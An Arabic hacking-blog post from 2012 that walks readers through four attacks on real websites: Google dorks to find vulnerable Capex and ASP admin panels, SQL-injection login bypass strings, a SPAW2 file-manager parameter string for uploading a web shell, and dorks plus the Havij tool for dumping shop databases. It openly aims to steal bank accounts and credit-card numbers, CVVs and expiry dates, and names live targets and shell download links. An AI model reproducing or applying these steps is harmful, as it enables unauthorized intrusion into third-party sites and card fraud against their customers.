عدد زوار الصفحه

13516

اخطر واقوى مدونه هكر فى الشرق الاوسط ترحب بكم

اخطر واقوى مدونه هكر فى الشرق الاوسط ترحب بكم

اهلا بكم فى اخطر واقوى مدونه هكر فى الشرق الاوسط

:: Security امان العرب Arab ::

جارٍ التحميل...

.:: منتديات العاصفة ::.

Error loading feed.

منظمة قبور الهكر

Error loading feed.

مدرسة الهكر الأخلاقي | Ethical Hacker school

Error loading feed.

. : منظمة الهكر العربي : . Arhack.Net

Error loading feed.

شبكة هكر اوف لاين

Error loading feed.

منتديات القرصان

جارٍ التحميل...

الخميس، 7 يونيو 2012

بعض الثغرات المفيدة واستغلالها

... اهلا وسهلا بالجميع ...
السلام عليكم ورحمة الله وبركاتة
يوجد ثغرات كتير بس اكترها مكشوفة فانا جبت 4 ثغرات مش معروفين وليس مسدودين
.:: الاولي ::.
ثغرة | Capexفي1.1 SQL |
الاول ندخل ع جوجل |
WwW.Google.CoM
ونكتب في خانة البحث نكتب
capexweb
وهيطلعلك مواقع زيـ
http://59.90.141.242:8085/capexweb/capexweb
ندخلـ علية :
ونكتب في
Username:
 x'or'x'='x
Password:
x'or'x'='x
وكدة مبروك عليك دخلت علي السي بانل
.::الثانية::.
اولا:
نذهب الي جوجل ::.
[WwW.Google.CoM]
نبحث عن ::
'?spaw2/dialog.php'
بعد كدة
يطلع معانا مواقع زي دي !!
http://www.commercexp.com/spaw2/dialogs/dialog.php
بتروح جي ضايف الاستغلال دة !! يعني بتروح جي ضايف الكلام دة بعدية
module=spawfm&dialog=spawfm&theme=spaw2&lang=sr&c harset=utf- 8&scid=7c78b510c597c41cbd6c469& ne
انت بق اعمل كدة مع اي موقع يطلعلك وبكدة تقدر ترفع الشل
لتحميل الشل
http://www.multiupload.nl/YIPA0UGVXM
تم الانتهاء
.::الثالثة::.
السلامـ عليكم ورحمة الله وبركاتة ...
اولا:
نروح للباحث :
WwW.Google.CoM
ونحط في البحث
(adminlogin.asp)
انسخ ما بين الاقواص فقط !!
تختار اي موقع هيدخل ع لوحة التحكم
تكتب في
User:
admin
Pass:
 ('=''or')
انسخ ما بين الاقواص فقط
نم الانتهاء
.:: الرابعة ::.
تسمي بثغرة قاعدة البيانات
هي ثغرة بتقدر من خلالها سحب معلومات الموقع وبياناتة
من اكونتات بنكية , اميلات , ومعلومات
اولأ: نروح لجوجل ::.
WwW.Google.CoM
ونبحث عن  الكود التالي ::.
انا جبتلك كذا كود لتسهيل الامر ::. علشان تتطلع مواقع مصابة كتير ::.
inurl:shop.php?do=part&id=

inurl:shopping.php?id=

inurl:produit.php?id=

inurl:buy.php?category=

inurl:boutique.php?page=

ندخل بقي علي الشرح ::.
ملحوظة ::.
هتلاقي الاميلات البنكية فيـ
Users
او
orders
او
Customers
.....
ملحوظة تانية ::.
اللي بتعلم عليهم علشان نسحب الفيزات والاكونتات البنكية هما ::.
1-CCV
2-CCNumbeR
3-CCexpiration_data
وشكرا ::.
الشرح :::. صور ::. وعليها كل الخطوات
لتحميل الشرح
http://www.multiupload.nl/L04KZL5ZIH
ملحوظة ::.
انا عندي مجبليش فيزات لان الموقع اللي حطوا دة لسة جديد مفهوش فيزات ::.
حضرتك لما تجرب وتبحث في جوجل هيجيلك مواقع كتير جدا بتاخد اي موقع منهم وبتسحب زي ما في الصور ::....
......
::. تحميل البرنامج ::. Havij 1.3
علي 5 سيرفرات ::. MultiUpload::.
http://www.multiupload.nl/NFWKTT7CDU
.....
تم الانتهاء
السلام عليكم ورحمة الله وبركاتة

مرسلة بواسطة في

ليست هناك تعليقات:

إرسال تعليق

الاشتراك في: تعليقات الرسالة (Atom)